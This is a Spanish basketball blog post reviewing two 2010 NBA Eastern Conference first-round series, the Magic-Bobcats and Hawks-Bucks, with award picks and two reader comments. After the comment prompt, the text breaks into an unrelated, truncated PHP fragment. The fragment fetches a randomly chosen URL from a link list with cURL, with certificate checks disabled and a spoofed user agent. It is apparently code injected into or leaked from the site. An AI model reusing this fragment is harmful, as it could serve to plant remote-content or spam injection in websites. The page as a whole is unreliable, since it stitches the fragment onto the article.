Playoffs 2009-2010: Primera ronda del Este (II)

03 de May de 2010 por Love Denise

MAGIC 4 – 0 BOBCATS (Telekoman)

Sabíamos que Orlando no iba a tener excesivos problemas para ganar su eliminatoria contra Charlotte, pero no pensábamos que iban a ser tan pocos. Los Bobcats no han sido capaces de ganar ni uno de los 4 partidos disputados pese a que su defensa sobre Howard ha sido ejemplar, desactivando totalmente a “Superman” y eliminándolo desquiciado en los 2 últimos encuentros. Por contra el perímetro de los Magic ha estado bien y eso ha bastado para ganar al equipo de Larry Brown que ha echado en falta una mayor contundencia en ataque, pese a que su banquillo no ha estado mal, sobre todo en los partidos de casa.

MVP: Nos vamos a quedar con Jameer Nelson que ha dirigido realmente bien a su equipo, no olvidándose de anotar. Sus 32 puntos en el tercer partido sirvieron para ganar un partido que se había puesto algo complicado.

El rookie: ¿Larry Brown y rookies? No, creo que por esa búsqueda no me sale nada. Claro que el amigo Van Gundy tampoco es que se prodige mucho.

La sorpresa: Sabíamos que la defensa de los pivots de Charlotte iba a incomodar mucho a Dwight Howard, pero nos ha sorprendido la forma en que ha sido anulado. Ya pueden tomar nota los pivots de Atlanta o de Milwaukee… Ah no! Que por esa búsqueda tampoco nos sale nada. Lástima.

La decepción: Esperaba algo más de Felton en esta eliminatoria pero se ha visto totalmente desbordado por Nelson. Y por supuesto Howard.

El mayor esfuerzo en vano: Evidentemente tendremos que meter en este saco a Wallace y a Jackson, que han puesto lo que han podido sobre la mesa. Claro que su últimos partidos partidos podrían haber sido algo mejores.

HAWKS 4 – 3 BUCKS (Love Denise)

He aquí la serie más igualada de esta primera ronda de Playoffs. A priori, casi todos dábamos por muertos a unos Bucks que no iban a poder contar con la participación de su principal estrella, Andrew Bogut, ni con el otrora jugador franquicia Michael Redd. Nuestras sospechas de que esto iba a acabar por la vía rapida se acrecentaron más aún cuando en los dos primeros partidos, los Hawks se pusieron con un 2-0 a su favor. Pero la serie dio un giro inesperado tras su llegada a Milwaukee, y aquí, los Bucks derrotaron a los Hawks gracias a la aportación de su trío exterior Jennings-Delfino-Salmons. La serie retornó a Atlanta y los Bucks contra todo pronóstico ganaron y se pusieron 2-3 a su favor. Y cuando parecía que Milwaukee podía dar la campanada, los halcones despertaron y arrasaron a los ciervos en el 6º y 7º choque, llevándose por tanto la serie por un global de 4-3.

MVP: Compartido para Joe Johnson y Jamal Crawford.

Rookie: Sin duda Brandon Jennings. El hombre que proclamaba ser mejor que Ricky Rubio se ha destapado como una de las mayores promesas en la NBA, cuajando una magnífica temporada y una notable fase final.

Sorpresa: La mayor sorpresa ha sido que los Bucks han vendido muy cara su derrota, aguantando hasta el último partido de la serie ante un equipo, en teoría, superior.

Decepción: No consideramos decepción la derrota de los Bucks, por lo que este premio recaería en el banquillo de los Hawks, donde el único hombre que aporta algo al equipo, es el mejor sexto hombre de la temporada, Jamal Crawford.

Esfuerzo en vano: Otorgaremos este honor a los Bucks en su conjunto, por haber tuteado a los Hawks pese a sus importantes lesiones.

Comenta

2 comentarios a esta entrada

  1. Toni dice:
    #1

    Bajo mi ver, el mvp sería Horford (de la serie de Atl-Mil) aunque contaba con ventaja por la falta del jugador interior determinante de la escuadra contrária.

      Citar

  2. Love Denise dice:
    #2

    Horford ha hecho buenos números, pero como bien has deducido (Toni), no es tan dificil hacer esos números contra el veterano THomas (que demasiado ha hecho el hombre) y Gadzuric. Sería dificil elegir el MVP en esta serie, aunque JO-Jo ha liderado al equipo, sus % no han sido los deseados.
    Sobre la serie Magic-Bobcats, un esfuerzo en vano también ha sido el de los arbitros jejeje y sus faltas a Howard.:)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>